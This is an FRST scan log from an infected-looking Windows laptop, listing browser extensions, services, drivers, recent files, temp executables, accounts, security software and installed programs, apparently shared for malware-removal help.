SearchScopes: HKU\S-1-5-21-934653896-176862922-3437185597-1002 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?PC=WCUG&FORM=WCUGDF&q={searchTerms}
 
FireFox:
========
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\windows\SysWOW64\Adobe\Director\np32dsw_1204144.dll [2013-09-05] (Adobe Systems, Inc.)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2013-02-06] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.13\npGoogleUpdate3.dll [2015-09-03] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.13\npGoogleUpdate3.dll [2015-09-03] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
 
Chrome: 
=======
CHR StartupUrls: Default -> "hxxp://www.facebook.com/"
CHR DefaultSuggestURL: Default -> {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:inputType}{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}{google:searchVersion}{google:sessionToken}{google:prefetchQuery}sugkey={google:suggestAPIKeyParameter}
CHR Profile: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-07-16]
CHR Extension: (Google Docs) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-07-16]
CHR Extension: (Google Drive) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-07-16]
CHR Extension: (YouTube) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-07-16]
CHR Extension: (Google Search) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-07-16]
CHR Extension: (Google Sheets) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-07-16]
CHR Extension: (Google Docs Offline) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-09-03]
CHR Extension: (AdBlock) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2015-07-16]
CHR Extension: (Chrome Hotword Shared Module) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-07-16]
CHR Extension: (Chrome Web Store Payments) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-07-16]
CHR Extension: (Gmail) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-07-16]
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 AdaptiveSleepService; C:\Program Files\ATI Technologies\ATI.ACE\A4\AdaptiveSleepService.exe [140288 2014-04-18] () [File not signed]
R2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [344064 2014-04-18] (Advanced Micro Devices, Inc.) [File not signed]
R2 ApHidMonitorService; C:\Program Files\Apoint2K\HidMonitorSvc.exe [87384 2015-02-05] (Alps Electric Co., Ltd.)
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [312448 2013-08-07] (Windows ® Win 7 DDK provider) [File not signed]
R2 HPWMISVC; C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe [1039160 2013-10-09] (Hewlett-Packard Development Company, L.P.)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2015-06-18] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1133880 2015-06-18] (Malwarebytes Corporation)
R2 NanoServiceMain; C:\Program Files (x86)\Panda Security\Panda Security Protection\PSANHost.exe [142584 2015-02-27] (Panda Security, S.L.)
R2 omniserv; C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe [88064 2014-03-29] (Softex Inc.) [File not signed]
R2 PandaAgent; C:\Program Files (x86)\Panda Security\Panda Devices Agent\AgentSvc.exe [66808 2014-10-09] (Panda Security, S.L.)
R2 PSUAService; C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAService.exe [38136 2015-02-27] (Panda Security, S.L.)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [290520 2014-02-13] (Realtek Semiconductor)
S3 w3logsvc; C:\Windows\system32\inetsrv\w3logsvc.dll [76800 2014-04-02] (Microsoft Corporation)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366520 2015-02-04] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-02-04] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AmdAS4; C:\Windows\System32\drivers\AmdAS4.sys [17640 2013-10-24] (Advanced Micro Devices, INC.)
R0 amdkmpfd; C:\Windows\System32\drivers\amdkmpfd.sys [36608 2013-12-14] (Advanced Micro Devices, Inc.)
R3 athr; C:\Windows\system32\DRIVERS\athwbx.sys [3858944 2013-10-17] (Qualcomm Atheros Communications, Inc.)
R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdWB6.sys [222720 2014-03-12] (Advanced Micro Devices)
R3 BthLEEnum; C:\Windows\system32\DRIVERS\BthLEEnum.sys [226304 2014-03-18] (Microsoft Corporation)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [91712 2013-03-06] (CyberLink)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
R1 gfilterdrv; C:\Windows\System32\drivers\gfilterdrv.sys [58168 2015-07-08] (Windows ® Win 7 DDK provider)
S3 hitmanpro37; C:\Windows\system32\drivers\hitmanpro37.sys [43664 2015-09-03] ()
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-06-18] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [113880 2015-09-03] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [64216 2015-06-18] (Malwarebytes Corporation)
R1 NNSALPC; C:\Windows\System32\DRIVERS\NNSAlpc.sys [93968 2015-02-10] (Panda Security, S.L.)
R1 NNSHTTP; C:\Windows\System32\DRIVERS\NNSHttp.sys [202000 2015-02-10] (Panda Security, S.L.)
R1 NNSHTTPS; C:\Windows\System32\DRIVERS\NNSHttps.sys [110864 2015-02-10] (Panda Security, S.L.)
R1 NNSIDS; C:\Windows\System32\DRIVERS\NNSIds.sys [116496 2015-02-10] (Panda Security, S.L.)
R1 NNSNAHSL; C:\Windows\system32\DRIVERS\NNSNAHSL.sys [49936 2014-12-31] (Panda Security, S.L.)
R1 NNSPICC; C:\Windows\System32\DRIVERS\NNSPicc.sys [99600 2015-02-10] (Panda Security, S.L.)
R1 NNSPIHSW; C:\Windows\System32\DRIVERS\NNSPihsw.sys [69904 2015-02-10] (Panda Security, S.L.)
R1 NNSPOP3; C:\Windows\System32\DRIVERS\NNSPop3.sys [124176 2015-02-10] (Panda Security, S.L.)
R1 NNSPROT; C:\Windows\System32\DRIVERS\NNSProt.sys [299792 2015-02-10] (Panda Security, S.L.)
R1 NNSPRV; C:\Windows\System32\DRIVERS\NNSPrv.sys [166160 2015-02-10] (Panda Security, S.L.)
R1 NNSSMTP; C:\Windows\System32\DRIVERS\NNSSmtp.sys [113424 2015-02-10] (Panda Security, S.L.)
R1 NNSSTRM; C:\Windows\System32\DRIVERS\NNSStrm.sys [257296 2015-02-10] (Panda Security, S.L.)
R1 NNSTLSC; C:\Windows\System32\DRIVERS\NNSTlsc.sys [106256 2015-02-10] (Panda Security, S.L.)
R2 PSINAflt; C:\Windows\System32\DRIVERS\PSINAflt.sys [163576 2015-06-18] (Panda Security, S.L.) [File not signed]
R2 PSINFile; C:\Windows\System32\DRIVERS\PSINFile.sys [121616 2015-02-26] (Panda Security, S.L.)
R1 PSINKNC; C:\Windows\System32\DRIVERS\psinknc.sys [197392 2015-02-26] (Panda Security, S.L.)
R2 PSINProc; C:\Windows\System32\DRIVERS\PSINProc.sys [124176 2015-02-26] (Panda Security, S.L.)
R2 PSINProt; C:\Windows\System32\DRIVERS\PSINProt.sys [133904 2015-02-26] (Panda Security, S.L.)
R2 PSINReg; C:\Windows\System32\DRIVERS\PSINReg.sys [107792 2015-02-26] (Panda Security, S.L.)
S3 PSKMAD; C:\Windows\System32\DRIVERS\PSKMAD.sys [61712 2015-05-22] (Panda Security, S.L.)
R3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [291544 2014-01-04] (Realtek Semiconductor Corp.)
S3 RTWlanE; C:\Windows\system32\DRIVERS\rtwlane.sys [1936088 2013-08-01] (Realtek Semiconductor Corporation                           )
R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20800 2013-07-23] (Hewlett-Packard Development Company, L.P.)
U3 McAPExe; no ImagePath
U3 McMPFSvc; no ImagePath
U3 McNaiAnn; no ImagePath
U3 mcpltsvc; no ImagePath
U3 mfecore; no ImagePath
U3 MSK80Service; no ImagePath
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-09-03 18:55 - 2015-09-03 18:55 - 00000000 _____ C:\Recovery.txt
2015-09-03 18:52 - 2015-09-03 18:52 - 00262144 _____ C:\Windows\system32\config\userdiff
2015-09-03 18:41 - 2015-09-03 18:41 - 00000000 ____D C:\$WINDOWS.~BT
2015-09-03 08:22 - 2015-09-03 08:36 - 00037008 _____ C:\Users\user\Downloads\FRST.txt
2015-09-03 08:20 - 2015-09-03 08:24 - 00000000 ____D C:\FRST
2015-09-03 08:00 - 2015-09-03 08:01 - 02188800 _____ (Farbar) C:\Users\user\Downloads\FRST64.exe
2015-09-03 07:46 - 2015-09-03 07:46 - 04116296 _____ (Google) C:\Users\user\Downloads\chrome_cleanup_tool.exe
2015-09-03 04:00 - 2015-09-03 04:00 - 00280760 _____ C:\Windows\Minidump\090315-21953-01.dmp
2015-09-03 02:24 - 2015-09-03 02:24 - 00043664 _____ C:\Windows\system32\Drivers\hitmanpro37.sys
2015-09-03 02:20 - 2015-09-03 02:24 - 00000000 ____D C:\ProgramData\HitmanPro
2015-09-03 02:16 - 2015-09-03 08:48 - 00113880 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-09-03 02:16 - 2015-09-03 02:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-09-03 02:16 - 2015-09-03 02:16 - 00000000 ____D C:\ProgramData\Malwarebytes
2015-09-03 02:16 - 2015-09-03 02:16 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-09-03 02:16 - 2015-06-18 08:42 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2015-09-03 02:16 - 2015-06-18 08:41 - 00109272 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-09-03 02:16 - 2015-06-18 08:41 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2015-09-03 02:15 - 2015-09-03 02:15 - 24345872 _____ (Malwarebytes Corporation ) C:\Users\user\Downloads\mbam-setup-2.1.8.1057.exe
2015-09-03 02:15 - 2015-09-03 02:15 - 11352032 _____ (SurfRight B.V.) C:\Users\user\Downloads\HitmanPro_x64.exe
2015-09-03 01:58 - 2015-09-03 02:04 - 00000000 ____D C:\AdwCleaner
2015-09-03 01:57 - 2015-09-03 01:57 - 01654272 _____ C:\Users\user\Downloads\adwcleaner_5.005.exe
2015-09-03 01:49 - 2015-09-03 01:49 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
2015-09-03 01:47 - 2015-09-03 07:53 - 00000900 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-09-03 01:47 - 2015-09-03 07:17 - 00000896 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-09-03 01:47 - 2015-09-03 01:47 - 00003872 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2015-09-03 01:47 - 2015-09-03 01:47 - 00003636 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2015-09-03 01:07 - 2015-09-03 01:07 - 00453120 __RSH C:\Users\user\AppData\Roaming\scrrunp.dll
2015-09-02 13:19 - 2015-09-02 17:49 - 00000000 __RHD C:\ESD
2015-09-02 05:22 - 2015-09-02 05:22 - 00000000 ____D C:\Users\user\AppData\Roaming\FireFoxUpdServeis
2015-09-01 03:54 - 2015-09-01 03:55 - 00843976 _____ C:\Windows\Minidump\090115-21859-01.dmp
2015-08-31 09:02 - 2015-08-31 09:02 - 00280760 _____ C:\Windows\Minidump\083115-27203-01.dmp
2015-08-30 10:39 - 2015-09-03 01:20 - 00000712 ____H C:\ProgramData\@system.temp
2015-08-30 10:38 - 2015-09-03 07:18 - 00000000 ____D C:\Users\user\AppData\Roaming\GoogleUpdate
2015-08-30 10:38 - 2015-09-03 01:20 - 00000448 ____H C:\ProgramData\@system3.att
2015-08-30 10:38 - 2015-08-30 10:38 - 00000464 ____H C:\Users\user\AppData\Roaming\½ž’“Ó™œ‰
2015-08-29 23:07 - 2015-08-29 23:07 - 00280760 _____ C:\Windows\Minidump\082915-39062-01.dmp
2015-08-29 13:45 - 2015-08-29 13:45 - 00280704 _____ C:\Windows\Minidump\082915-30109-01.dmp
2015-08-18 23:51 - 2015-08-18 23:56 - 00000000 ____D C:\ProgramData\pauhu
2015-08-17 02:34 - 2015-08-17 02:34 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HoMM3 HD
2015-08-16 21:30 - 2015-08-16 21:30 - 00000364 _____ C:\Windows\mplaynow.log
2015-08-16 21:30 - 2015-08-16 21:30 - 00000000 ____D C:\Windows\wb
2015-08-15 15:24 - 2015-08-15 15:24 - 00280704 _____ C:\Windows\Minidump\081515-20640-01.dmp
2015-08-14 18:15 - 2015-09-02 05:12 - 00000000 ____D C:\Users\user\AppData\Local\YbPack
2015-08-14 17:25 - 2015-09-02 04:48 - 00000000 ____D C:\Users\user\AppData\Local\Ufrmedia
2015-08-12 15:01 - 2015-09-03 04:00 - 519323636 _____ C:\Windows\MEMORY.DMP
2015-08-12 15:01 - 2015-09-03 04:00 - 00000000 ____D C:\Windows\Minidump
2015-08-12 15:01 - 2015-08-12 15:01 - 00280704 _____ C:\Windows\Minidump\081215-18234-01.dmp
2015-08-11 13:46 - 2015-08-11 13:46 - 00000000 ____D C:\Users\user\Documents\Ubisoft
2015-08-11 13:46 - 2015-08-11 13:46 - 00000000 ____D C:\Users\user\AppData\Roaming\Steam
2015-08-11 13:41 - 2015-09-03 04:00 - 00006215 _____ C:\Windows\setupact.log
2015-08-11 13:41 - 2015-09-03 04:00 - 00001836 _____ C:\Windows\PFRO.log
2015-08-11 13:41 - 2015-08-11 13:41 - 00000000 _____ C:\Windows\setuperr.log
2015-08-11 13:33 - 2015-09-02 16:40 - 00016758 _____ C:\Windows\WindowsUpdate.log
2015-08-11 13:33 - 2015-08-16 21:45 - 00466456 _____ (Creative Labs) C:\Windows\system32\wrap_oal.dll
2015-08-11 13:33 - 2015-08-16 21:45 - 00444952 _____ (Creative Labs) C:\Windows\SysWOW64\wrap_oal.dll
2015-08-11 13:33 - 2015-08-16 21:45 - 00122904 _____ (Portions © Creative Labs Inc. and NVIDIA Corp.) C:\Windows\system32\OpenAL32.dll
2015-08-11 13:33 - 2015-08-16 21:45 - 00109080 _____ (Portions © Creative Labs Inc. and NVIDIA Corp.) C:\Windows\SysWOW64\OpenAL32.dll
2015-08-11 13:33 - 2015-08-11 13:33 - 00000000 ____D C:\Program Files (x86)\OpenAL
2015-08-10 16:20 - 2015-08-10 16:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Anvisoft
2015-08-10 16:20 - 2015-08-10 16:27 - 00000000 ____D C:\Program Files (x86)\Anvisoft
2015-08-10 14:27 - 2015-08-10 14:27 - 00000000 ____H C:\Windows\system32\Drivers\Msft_User_WpdMtpDr_01_11_00.Wdf
2015-08-07 20:33 - 2015-08-07 20:33 - 00000000 ____D C:\Users\user\AppData\Local\GWX
2015-08-07 17:04 - 2015-08-31 13:51 - 00000000 ____D C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2015-08-07 16:51 - 2015-07-08 01:06 - 00058168 _____ (Windows ® Win 7 DDK provider) C:\Windows\system32\Drivers\gfilterdrv.sys
2015-08-07 16:47 - 2015-08-07 16:47 - 00000000 ____D C:\Users\user\AppData\Local\Steam
2015-08-07 16:47 - 2015-08-07 16:47 - 00000000 ____D C:\Users\user\AppData\Local\CEF
2015-08-07 12:47 - 2015-08-07 12:47 - 00000000 ____D C:\Users\user\AppData\Roaming\LaunchPad
2015-08-05 16:46 - 2015-08-05 16:46 - 00000000 ____D C:\Users\user\Downloads\Robert Jordan & Brandon Sanderson - Wheel of Time 14 - A Memory of Light (v4.0)
2015-08-05 16:24 - 2015-08-05 16:24 - 00000000 ____D C:\Users\user\AppData\Local\calibre-cache
2015-08-05 16:23 - 2015-08-05 16:54 - 00000000 ____D C:\Users\user\Documents\Calibre Library
2015-08-05 16:22 - 2015-08-05 16:24 - 00000000 ____D C:\Users\user\AppData\Roaming\calibre
2015-08-05 16:22 - 2015-08-05 16:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\calibre 64bit - E-book Management
2015-08-05 16:22 - 2015-08-05 16:22 - 00000000 ____D C:\Program Files\Calibre2
2015-08-05 15:13 - 2015-08-05 15:13 - 00000000 ____D C:\Users\user\AppData\Roaming\WinRAR
2015-08-05 13:56 - 2015-08-05 13:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-09-03 08:48 - 2015-07-17 00:03 - 00000000 ____D C:\Users\user\AppData\Roaming\uTorrent
2015-09-03 08:00 - 2013-08-23 01:36 - 00000000 ____D C:\Windows\system32\sru
2015-09-03 07:24 - 2013-08-23 01:36 - 00000000 ____D C:\Windows\LiveKernelReports
2015-09-03 07:22 - 2015-03-19 07:23 - 00003594 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-934653896-176862922-3437185597-1002
2015-09-03 07:19 - 2015-03-19 07:20 - 00000000 ____D C:\Users\user\Documents\Youcam
2015-09-03 07:18 - 2015-07-18 17:41 - 00000000 ____D C:\Program Files (x86)\Steam
2015-09-03 07:17 - 2015-07-16 18:48 - 00000000 ___DO C:\Users\user\OneDrive
2015-09-03 04:00 - 2013-08-23 00:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-09-03 02:11 - 2014-03-18 19:53 - 00956476 _____ C:\Windows\system32\PerfStringBackup.INI
2015-09-03 02:05 - 2015-03-19 06:41 - 00065536 _____ C:\Windows\system32\spu_storage.bin
2015-09-03 01:49 - 2015-07-16 18:36 - 00000000 ____D C:\Program Files (x86)\Google
2015-09-03 01:47 - 2015-07-16 18:33 - 00000000 ____D C:\Users\user\AppData\Local\Deployment
2015-09-03 00:34 - 2015-03-19 07:18 - 00003898 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{962FEC79-917D-4E82-BD62-17EA45F302FE}
2015-09-02 13:37 - 2015-07-18 18:59 - 00000000 ____D C:\Users\user\AppData\Roaming\vlc
2015-09-02 13:14 - 2015-07-16 18:35 - 00000000 ____D C:\Users\user\AppData\Local\Google
2015-09-01 00:31 - 2013-08-22 23:25 - 00262144 ___SH C:\Windows\system32\config\BBI
2015-08-31 13:57 - 2014-05-13 18:10 - 00000000 ____D C:\Program Files (x86)\WildGames
2015-08-31 13:53 - 2014-05-13 18:10 - 00000000 ____D C:\ProgramData\WildTangent
2015-08-31 13:53 - 2014-05-13 18:10 - 00000000 ____D C:\Program Files (x86)\WildTangent Games
2015-08-20 18:52 - 2013-08-23 01:36 - 00000000 ____D C:\Windows\rescache
2015-08-16 21:10 - 2013-08-23 01:20 - 00000000 ____D C:\Windows\CbsTemp
2015-08-16 21:09 - 2015-07-19 17:20 - 00220672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dplayx.dll
2015-08-16 21:09 - 2015-07-19 17:19 - 00046592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpwsockx.dll
2015-08-16 21:09 - 2015-07-19 17:10 - 00024576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpmodemx.dll
2015-08-16 21:09 - 2015-07-19 17:09 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dplaysvr.exe
2015-08-16 21:09 - 2013-08-22 21:22 - 00461312 _____ (Microsoft Corporation) C:\Windows\system32\dpnet.dll
2015-08-16 21:09 - 2013-08-22 21:22 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\dpnsvr.exe
2015-08-16 21:09 - 2013-08-22 21:17 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\dpnathlp.dll
2015-08-16 21:09 - 2013-08-22 21:17 - 00009216 _____ (Microsoft Corporation) C:\Windows\system32\dpnhupnp.dll
2015-08-16 21:09 - 2013-08-22 21:17 - 00009216 _____ (Microsoft Corporation) C:\Windows\system32\dpnhpast.dll
2015-08-16 21:09 - 2013-08-22 13:56 - 00377856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnet.dll
2015-08-16 21:09 - 2013-08-22 13:56 - 00033792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnsvr.exe
2015-08-16 21:09 - 2013-08-22 13:51 - 00059904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnathlp.dll
2015-08-16 21:09 - 2013-08-22 13:51 - 00009216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnhupnp.dll
2015-08-16 21:09 - 2013-08-22 13:51 - 00009216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnhpast.dll
2015-08-14 18:15 - 2015-07-10 16:02 - 00000000 __SHD C:\Users\user\AppData\Local\EmieUserList
2015-08-14 18:15 - 2015-07-10 16:02 - 00000000 __SHD C:\Users\user\AppData\Local\EmieSiteList
2015-08-11 13:39 - 2015-03-19 06:39 - 00000000 ____D C:\ProgramData\Package Cache
2015-08-10 16:25 - 2014-04-02 20:25 - 00000000 ____D C:\Windows\Panther
2015-08-05 13:47 - 2013-08-23 00:44 - 00383584 _____ C:\Windows\system32\FNTCACHE.DAT
 
==================== Files in the root of some directories =======
 
2015-09-03 01:07 - 2015-09-03 01:07 - 0453120 __RSH () C:\Users\user\AppData\Roaming\scrrunp.dll
2015-08-30 10:38 - 2015-08-30 10:38 - 0000464 ____H () C:\Users\user\AppData\Roaming\½ž’“Ó™œ‰
2015-08-30 10:39 - 2015-09-03 01:20 - 0000712 ____H () C:\ProgramData\@system.temp
2015-08-30 10:38 - 2015-09-03 01:20 - 0000448 ____H () C:\ProgramData\@system3.att
2015-07-19 15:22 - 2015-06-16 07:16 - 0076288 ___SH () C:\ProgramData\msbogj.exe
 
Files to move or delete:
====================
C:\ProgramData\msbogj.exe
 
 
Some files in TEMP:
====================
C:\Users\user\AppData\Local\Temp\Heroes_of_Might_and_Magic_3_Complete_PC_Free.exe
C:\Users\user\AppData\Local\Temp\KB166593328.exe
C:\Users\user\AppData\Local\Temp\KB289558421.exe
C:\Users\user\AppData\Local\Temp\KB41462734.exe
C:\Users\user\AppData\Local\Temp\KB543130078.exe
C:\Users\user\AppData\Local\Temp\linstocks.dll
C:\Users\user\AppData\Local\Temp\Plugin.exe
C:\Users\user\AppData\Local\Temp\sqlite3.dll
C:\Users\user\AppData\Local\Temp\update.exe
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
Addition:
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version:31-08-2015
Ran by user (2015-09-03 08:50:22)
Running from C:\Users\user\Downloads
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-934653896-176862922-3437185597-500 - Administrator - Disabled)
Guest (S-1-5-21-934653896-176862922-3437185597-501 - Limited - Disabled)
user (S-1-5-21-934653896-176862922-3437185597-1002 - Administrator - Enabled) => C:\Users\user
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Panda Free Antivirus (Enabled - Up to date) {AAF74A68-8713-CDF1-004F-30003398BE9E}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Panda Free Antivirus (Enabled - Up to date) {1196AB8C-A129-C27F-3AFF-0B72481FF423}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Panda Firewall (Disabled) {92CCCB4D-CD7C-CCA9-2B10-9935CD4BF9E5}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
µTorrent (HKU\S-1-5-21-934653896-176862922-3437185597-1002\...\uTorrent) (Version: 3.4.4.40911 - BitTorrent Inc.)
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.4.144 - Adobe Systems, Inc.)
ALPS Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 8.1202.1711.102 - Alps Electric)
AMD Catalyst Install Manager (HKLM\...\{7536C341-2F7D-EFE6-F521-DEBE68B025C5}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.)
calibre 64bit (HKLM\...\{D4DF4C08-5DCA-4664-8612-1A8511D6F8B4}) (Version: 2.33.0 - Kovid Goyal)
CyberLink LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.5.6902 - CyberLink Corp.)
CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.5.3416 - CyberLink Corp.)
CyberLink PowerDVD 12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.3.3709 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 5.0.3.3907 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DisableMSDefender (Version: 1.0.0 - Hewlett-Packard Company) Hidden
Energy Star (HKLM\...\{465CA2B6-98AF-4E77-BE22-A908C34BB9EC}) (Version: 1.0.9 - Hewlett-Packard Company)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 45.0.2454.85 - Google Inc.)
Google Update Helper (x32 Version: 1.3.28.13 - Google Inc.) Hidden
HP Documentation (HKLM-x32\...\{3BAA7681-EF42-4FEC-84FC-87BA815492A4}) (Version: 1.2.0.0 - Hewlett-Packard)
HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.7372.4698 - Hewlett-Packard)
HP SimplePass (HKLM-x32\...\InstallShield_{314FAD12-F785-4471-BCE8-AB506642B9A1}) (Version: 8.01.11 - Hewlett-Packard)
HP System Event Utility (HKLM-x32\...\{C78E8F51-3EAD-4F0C-83F0-EF371075E0B4}) (Version: 1.0.10 - Hewlett-Packard Company)
